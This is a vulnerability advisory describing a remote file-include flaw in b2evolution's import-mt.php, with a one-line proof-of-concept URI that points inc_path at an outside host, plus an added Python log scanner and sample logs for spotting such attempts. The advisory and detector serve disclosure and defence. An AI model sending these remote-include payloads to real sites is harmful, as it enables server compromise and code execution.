B2Evolution Import-MT.PHP Remote File Include Vulnerability
BID:21332
Info
| Field | Value |
|---|---|
| Bugtraq ID: | 21332 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 28 2006 12:00AM |
| Updated: | Nov 29 2006 10:00PM |
| Credit: | tarkus is credited with the discovery of this vulnerability. |
| Vulnerable: | b2evolution b2evolution 1.8.5; b2evolution b2evolution 1.9 beta; b2evolution b2evolution 1.9 |
| Not Vulnerable: | |
Discussion
The b2evolution application is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
This issue affects b2evolution 1.8.5 through 1.9 beta.
Exploit / POC
An attacker may exploit this issue using a web client.
The following proof-of-concept URI is available:
http://www.example.com/<b2epath>/inc/CONTROL/import/import-mt.php?basepath=foo&inc_path=https://www.example2.com/tarkus/PoC/
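Defenders can check web-server access logs for requests matching the proof-of-concept pattern above (a URL-valued `inc_path` or `basepath` sent to `import-mt.php`). The following is an added example, not part of the advisory or of b2evolution; it assumes Common Log Format access logs, and the sample log lines are constructed.

```python
# Added example (not from the advisory or the b2evolution project): flag
# access-log requests to import-mt.php whose inc_path/basepath carries a URL
# or a PHP stream wrapper, the signature of a remote-file-include attempt.
import re
from urllib.parse import urlsplit, parse_qs

# Parameter names taken from the advisory's PoC URI.
WATCHED_PARAMS = ("inc_path", "basepath")
# A value that starts with scheme:// or //, or a php:/data:/ftp: wrapper.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//|^\s*(?:php|data|ftp):", re.I)

# Common Log Format: client IP first, request line in the quoted field.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def inspect_request(target):
    """Return (param, value) pairs that look like remote includes in one
    request target; [] if the request is not a suspicious import-mt.php hit."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/import/import-mt.php"):
        return []
    qs = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    for name in WATCHED_PARAMS:
        for value in qs.get(name, []):
            if REMOTE_VALUE.search(value):
                hits.append((name, value))
    return hits

def scan_log(lines):
    """Yield (client_ip, param, value) for each suspicious request in the log."""
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        for name, value in inspect_request(m.group("target")):
            yield (m.group("ip"), name, value)

# Constructed sample log: a benign import, a PoC-style attempt, an unrelated hit.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Nov/2006:10:15:02 +0000] "GET /blog/inc/CONTROL/import/import-mt.php?basepath=foo HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/Nov/2006:10:16:40 +0000] "GET /blog/inc/CONTROL/import/import-mt.php?basepath=foo&inc_path=https://www.example2.com/tarkus/PoC/ HTTP/1.1" 200 77',
    '203.0.113.5 - - [28/Nov/2006:10:17:01 +0000] "GET /blog/index.php?inc_path=http://evil.example/ HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, name, value in scan_log(SAMPLE_LOG):
        print(f"RFI attempt from {ip}: {name}={value}")
```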
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References